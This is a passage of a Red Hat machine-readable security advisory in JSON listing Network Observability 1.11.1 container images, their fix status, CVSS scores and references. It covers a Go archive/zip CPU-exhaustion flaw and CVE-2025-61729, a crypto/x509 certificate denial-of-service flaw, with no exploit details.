"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
